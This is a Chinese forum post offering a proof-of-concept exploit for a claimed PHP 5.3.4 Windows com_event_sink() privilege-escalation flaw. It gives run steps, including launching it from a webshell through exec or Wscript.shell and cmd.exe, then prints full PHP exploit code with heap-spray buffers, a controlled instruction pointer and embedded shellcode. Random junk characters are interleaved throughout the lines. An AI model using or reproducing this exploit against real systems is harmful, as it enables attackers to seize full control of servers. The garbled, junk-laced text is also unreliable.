|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中/ r8 p3 K' r# v! n& T
+ n f7 A+ G; V) t1 `" N测试方法如下:cmd /c x:\php\php.exe x:\test.php, l) G4 ~8 m) ~. N
; K: |6 u4 } A% T4 T% y0 Q$ U下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php, D- {5 F. {7 Y8 ~" P6 i; n. P" W+ |
这里是两个测试的截图:
- O+ H, {0 e4 g; T4 {" p B" K( c( q/ R8 j) O/ r2 {
+ d( ?( ? q+ J" K/ J& C$ a
9 H7 B7 p7 [1 j# ^ ]) W
% e# s( t2 e# ~- j- K, O, g
5 V/ M) D9 z" O+ F成功利用此漏洞的攻击者将获得系统的最高权限( }& q. \& {+ |& G- u( a3 C
# u k% V: t" q3 |9 O5 J
, ^ L7 C7 p& h4 {0 O7 r F
' \# {# H m% U- ]: x( A" c1 C+ }! q
0 `/ ~6 s4 l0 P/ |关于漏洞分析稍后附上。一下是PoC代码: a+ D3 w7 p9 T- V. W
7 X( p) c' l) `3 Y0 K<?php
3 F; E+ `6 R" W s9 I7 B//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
9 z. ~- }" f8 Y7 p//$eip ="\x44\x43\x42\x41";: ]" L4 s; u$ D* p2 a
$eip= "\x4b\xe8\x57\x78";
6 O$ E7 [) w$ U0 N! _$eax ="\x80\x01\x8d\x04";" ^( R- N6 E$ ^) Q9 s
$deodrant="";
3 r4 X8 l; u9 o& \4 D$ r' V. o" e, K, }$axespray = str_repeat($eip.$eax,0x80);
; Q. Q# l4 \4 Z//048d0190
- \+ h8 V7 }+ X. J+ G' hecho strlen($axespray);4 H% x" ?2 A, _1 t2 @% Y3 W
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
3 T; F# d [7 I; Kecho "Silic Group Hacker Army - BlackBap.Org";
L. }* K# \5 T% }//19200 ==4B32 4b00! B4 S% V% Q' A8 E/ \# @
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
( m( U) R0 z3 w2 I" d/ B' A$terminate = "T";+ \8 M+ a8 w) P0 W' g
$u[] =$deodrant;! b+ o! t# h$ R" }) C( W4 ?
$r[] =$deodrant.$terminate;6 e" L& p' r( j S/ K u9 o2 {' }" Z: l
$a[] =$deodrant.$terminate;3 s; O+ w. g1 w$ J ?! f$ F! j& B
$s[] =$deodrant.$terminate;
" P! u* z, t! t2 J4 |! v//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
( d2 i3 z" v6 ]% O0 c) x$vVar = new VARIANT(0x048d0000+180);* [: f8 T9 G" o2 A" q
//弹窗代码(Shellcode)4 t' D9 u8 _/ V" c# ?
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";1 H4 q$ Y% c+ D8 Y2 e' q
$var2 = new VARIANT(0x41414242);
3 a) }4 p! g# u6 R& g: R3 c* _; {com_event_sink($vVar,$var2,$buffer);
7 {" u" z' w' B* l m?>1 v' k3 U6 u& |
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|